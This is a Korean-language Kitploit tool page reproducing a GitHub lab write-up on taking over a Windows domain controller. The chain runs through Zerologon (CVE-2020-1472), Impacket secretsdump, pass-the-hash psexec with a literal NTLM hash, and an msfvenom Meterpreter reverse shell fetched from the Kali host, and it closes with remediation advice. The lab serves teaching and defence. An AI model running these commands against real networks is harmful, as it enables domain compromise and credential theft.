Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Domain-Controller-DC-Exploitation-with-Metasploit-Impacket — Metasploit 및 Impacket을 사용한 종단간 도메인 컨트롤러 익스플로잇: DC10 발견, Zerologon(CVE-2020-1472) 악용, NTLM 해시 추출, SYSTEM 셸 획득, Meterpreter 세션 수립. | Kitploit
도구/GitHubGitHub/nyambiblaise/domain-controller-dc-exploitation-with-metasploit-impacket
ReconnaissanceExploit FrameworksPayload GenerationVulnerability AnalysisLateral MovementPost-ExploitationPenetration TestingLearning & EducationLabs & Practice

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHubnyambiblaise/domain-controller-dc-exploitation-with-metasploit-impacket

Domain-Controller-DC-Exploitation-with-Metasploit-Impacket

Metasploit 및 Impacket을 사용한 종단간 도메인 컨트롤러 익스플로잇: DC10 발견, Zerologon(CVE-2020-1472) 악용, NTLM 해시 추출, SYSTEM 셸 획득, Meterpreter 세션 수립.

저장소 보기
510개월 전아직 검토되지 않음

Metasploit 및 Impacket을 이용한 도메인 컨트롤러(DC) 익스플로잇

Metasploit과 Impacket을 사용한 종단간 도메인 컨트롤러 익스플로잇: DC10 발견, Zerologon(CVE-2020-1472) 익스플로잇, NTLM 해시 추출, SYSTEM 셸 획득, Meterpreter 세션 수립.

Executive Summary 이 실습은 CVE-2020-1472(Zerologon)에 취약한 도메인 컨트롤러에 대한 완전하고 현실적인 공격 체인을 보여줍니다. 작업에는 발견, 서비스 강화, 익스플로잇, 자격 증명 추출, 측면 이동 및 사후 익스플로잇 검증이 포함되었습니다. Zerologon, Impacket secretsdump + pass-the-hash, msfvenom/meterpreter 페이로드를 조합하여 DC에서 SYSTEM 수준의 액세스를 성공적으로 획득하고 지속적인 Meterpreter 세션을 수립했습니다. 각 단계의 스크린샷과 명령 아티팩트가 증거로 캡처되었습니다.

𝐋𝐚𝐛 𝐨𝐯𝐞𝐫𝐯𝐢𝐞𝐰: 𝐖𝐢𝐧𝐝𝐨𝐰𝐬 𝐃𝐨𝐦𝐚𝐢𝐧 𝐂𝐁𝐧𝐁𝐁𝐁𝐁𝐁𝐁(도메인 컨트롤러)에서 𝐌𝐞𝐁𝐁𝐁𝐁𝐁𝐁와 𝐈𝐁𝐁𝐁𝐁𝐁𝐁𝐁를 사용한 전체 공격 체인 시뮬레이션; 발견, Zerologon, secretsdump, pass-the-hash, 제어된 Meterpreter 세션.

𝐖𝐡𝐲 𝐢𝐁 𝐦𝐁𝐁𝐁𝐁𝐁𝐁𝐁 𝐁𝐁 𝐨𝐁𝐁𝐁𝐁𝐁𝐁𝐁𝐁𝐁𝐁𝐁: DC는 전체 도메인의 인증, 그룹 정책 및 ID를 제어하므로, 침해 시 완전한 비즈니스 중단, 계정 탈취, 데이터 유출, 랜섬웨어 배포 및 규제 신뢰 상실로 이어질 수 있습니다. DC를 보호하면 공격자가 ID를 단일 장애 지점으로 전환하는 것을 방지하여 가동 시간, 수익 및 평판을 보호할 수 있습니다.

Domain Controller (DC) Exploitation with Metasploit + Impacket

SCENARIO

제한된 랩 네트워크에 두 대의 머신이 제공됩니다. 한 시스템은 DC10이라는 Windows 도메인 컨트롤러(DC)로 핵심 AD 서비스를 호스팅합니다. 다른 시스템은 테스트를 위해 동일한 서버 서브넷에 배치된 Kali 워크스테이션입니다. DC는 일반적인 도메인 서비스(예: LDAP, Kerberos, SMB)를 노출하고 알려진 취약점에 취약할 수 있다고 가정합니다. Kali 호스트는 정찰, 익스플로잇, 자격 증명 액세스, 측면 이동 및 사후 익스플로잇 검증에 사용될 것으로 예상됩니다. 과제는 DC를 식별하고, 도메인 세부 정보를 확인하고, 적용 가능한 기술을 사용하여 초기 발판을 확보하고, 관리 액세스를 가능하게 하는 자격 증명 자료를 추출한 다음, 원격 셸과 관리형 에이전트 세션을 통해 DC 제어를 입증하는 동시에 패치된 서비스, 제한된 이그레스 또는 엔드포인트 방어와 같은 환경적 제약에 적응하는 것입니다. DC: 10.1.16.1 Kali: 10.1.16.66

Key Findings

  • 악용된 중요 취약점: CVE-2020-1472(Zerologon)이 성공적으로 악용되어 DC 머신 계정 비밀번호가 빈 값으로 재설정되었습니다.
  • 자격 증명 손상: DC(secretsdump)에서 NTLM 해시가 추출되어 pass-the-hash를 가능하게 하는 Administrator 자격 증명이 드러났습니다.
  • 완전한 도메인 제어 입증: 추출된 해시를 사용하여 DC10에서 SYSTEM 셸을 획득(psexec)하고 안정적인 Meterpreter 리버스 셸을 실행하여 원격 코드 실행 및 지속성을 확인했습니다.
  • 노출된 서비스: LDAP, Kerberos, SMB 및 관련 RPC 서비스가 공격 호스트에서 접근 가능하여 발견 및 익스플로잇이 가능했습니다.
  • 공격 표면 위험: DC는 머신 계정 조작 및 원격 페이로드 실행을 허용하는 원격 작업을 수락했습니다.

1) Discovery and Scoping

DB 지원이 있는 msfconsole을 사용하고, MSF 내에서 nmap 스윕을 실행하고, 결과를 가져오고, 호스트와 서비스를 정제하여 DC10의 노출을 확인했습니다.

  • DB 지원으로 msfconsole을 실행하고 데이터베이스 연결을 확인했습니다.
  • msfconsole에서 서브넷 전체에 nmap 스캔을 실행하고 결과를 MSF DB로 가져왔습니다.
  • 호스트 테이블을 정리하여 내 Kali IP를 제거했습니다. 서비스를 검토하여 DC 가능성이 있는 지표를 찾았습니다.
  • 제한된 포트 범위와 전역 스레딩을 사용하여 MSF의 SYN 포트 스캐너로 서비스 데이터를 정제했습니다.
  • Windows 호스트에서 SMB를 핑거프린팅하여 OS 세부 정보를 보강했습니다.
  • 10.1.16.1에서 LDAP 및 Kerberos 서비스를 확인하고 LDAP 쿼리를 통해 도메인 이름을 검증했습니다.
  • 결정: 10.1.16.1을 익스플로잇 및 자격 증명 액세스의 DC 초점으로 간주합니다.
Image Image Image

2) Service Enrichment and DC Confirmation

MSF에서 SYN 포트 스캔을 수행하고, SMB를 핑거프린팅하고, 10.1.16.1에서 LDAP 및 Kerberos를 확인했습니다. LDAP을 쿼리하여 도메인 이름을 검색했습니다.

Image Image Image Image Image ### SMB version check
  • msfconsole에서 SMB 버전 모듈 auxiliary/scanner/smb/smb_version을 사용했습니다.
  • hosts -R로 호스트 테이블에서 대상을 설정했습니다.
  • SMB 방언 및 OS 세부 정보를 받았습니다.
  • 결과: 10.1.16.1에서 Windows Server 정보가 표시되어 도메인 컨트롤러임을 확인했습니다.
Image Image Image Image Image

LDAP query

  • LDAP 쿼리 모듈 auxiliary/gather/ldap_query를 사용했습니다.
  • rhosts 10.1.16.1로 설정하여 DC10을 직접 타겟팅했습니다.
  • 기본 디렉터리 정보를 가져오기 위해 실행했습니다.
  • 결과: 도메인 이름이 "structureality"임을 확인하고 DC의 LDAP가 응답하고 있음을 확인했습니다.
Image Image Image Image

3) Zerologon Exploitation (Initial Access)

DC10에 대해 auxiliary/admin/dcerpc/cve_2020_1472_zerologon을 실행하여 머신 계정 비밀번호를 빈 값으로 재설정했습니다.

Image Image

4) Credential Access (secretsdump)

Impacket을 사용하여 DC에서 NTLM 해시를 덤프하고 pass-the-hash를 위한 Administrator 자격 증명을 식별했습니다.

impacket-secretsdump -just-dc-ntlm structureality/dc10\[email protected]

Image Image

5) Lateral Movement (psexec)

pass-the-hash와 psexec을 사용하여 DC10에서 SYSTEM 수준의 셸을 획득하고 호스트 ID를 확인했습니다.

impacket-psexec structureality/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:dae57d78fec919471799ce0fae8236b9 보시다시피, 이미 C:\Windows\system32에 있습니다.

Image Image

6) Post-Exploitation (Meterpreter)

reverse_tcp meterpreter 페이로드를 생성하고, HTTP로 호스팅하고, DC10에 다운로드하고, 핸들러를 시작하고, 페이로드를 실행하여 Meterpreter 세션을 열었습니다.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.1.16.66 LPORT=4567 -f exe -o secretfile.exe

Image Image 대상 시스템이 이 meterpreter 실행 파일에 쉽게 액세스할 수 있도록 기본 웹 서버를 시작했습니다.

python3 -m http.server 8080

Image 대상 머신에서 meterpreter 실행 파일(secret.exe)을 실행했습니다. Image Image Image Image Image

보시다시피, 이제 대상 DC10과 Kali 시스템 간의 리버스 셸 연결을 수립했습니다. 이는 취약한 대상에 대해 외부/원격 익스플로잇만을 사용하여 이루어졌습니다.

Kali 시스템은 DC10 대상과 동일한 서버 서브넷에 위치하지만, 이러한 유형의 공격은 대상 시스템이 공개 인터넷에 노출된 경우 인터넷을 통해 가능합니다.

7) Key Outcomes

  • DC10이 structureality의 도메인 컨트롤러로 식별됨
  • Zerologon 성공으로 자격 증명 추출 가능
  • Administrator 해시를 사용하여 pass-the-hash로 SYSTEM 셸 획득
  • DC10에서 안정적인 Meterpreter 세션 확인됨

Evidence

  • 호스트/서비스 발견을 확인하는 MSF DB 및 nmap 서브넷 스캔 로그.
  • DC 서비스 및 도메인 이름 structureality를 확인하는 SMB/LDAP/Kerberos 열거 출력.
  • 머신 계정 비밀번호가 빈 값으로 재설정되었음을 보여주는 Zerologon 모듈 출력.
  • 추출된 NTLM 해시가 포함된 secretsdump 출력.
  • C:\Windows\System32를 보여주는 psexec 세션 로그.
  • 원격 제어를 확인하는 msfvenom 및 Meterpreter 세션 스크린샷.

Actions Performed (summary)

  • Discovery & Scoping: msfconsole에서 nmap 스캔; MSF DB를 사용하여 호스트/서비스 관리; DC10을 대상으로 확인.
  • Service Enrichment: SMB 핑거프린팅, LDAP 쿼리, Kerberos 확인을 통해 도메인 컨트롤러 역할 검증.
  • Initial Access: auxiliary/admin/dcerpc/cve_2020_1472_zerologon 실행하여 DC 머신 계정 비밀번호 재설정.
  • Credential Access: impacket-secretsdump로 DC에서 NTLM 해시 추출.
  • Lateral Movement: Administrator NTLM 해시를 사용한 impacket-psexec → SYSTEM 셸.
  • Post-Exploitation: meterpreter 페이로드(msfvenom) 빌드 및 호스팅, DC에 다운로드 및 실행, 지속적 세션 확인.

Recommendations for the Network Owners

  • 즉시 Netlogon 취약점 패치 및 CVE-2020-1472 노출 여부 스캔으로 확인
  • SMB 서명 적용 및 DC의 SMB/RPC 노출을 신뢰할 수 있는 관리 서브넷으로만 제한
  • 계층적 관리 구현 및 비관리 호스트에서의 원격 서비스 실행 차단
  • NTLM 비활성화 또는 엄격히 제어, Kerberos 선호 및 pass-the-hash 패턴 모니터링
  • 이그레스 제어: 서버의 아웃바운드 연결 제한, 필요한 대상 및 포트만 허용 목록에 추가
  • 엔드포인트 보호: 서명되지 않은 바이너리 차단 및 PowerShell에 AMSI 통합 검사 적용
  • 모니터링: 머신 계정 비밀번호 재설정, 비정상적인 DRSUAPI 액세스, 예상치 못한 핸들러 유사 리스너에 대한 경고
  • 권한 있는 자격 증명을 정기적으로 교체하고 LAPS 또는 PAM 솔루션을 사용하여 해시 재사용 위험 감소
도구 다운로드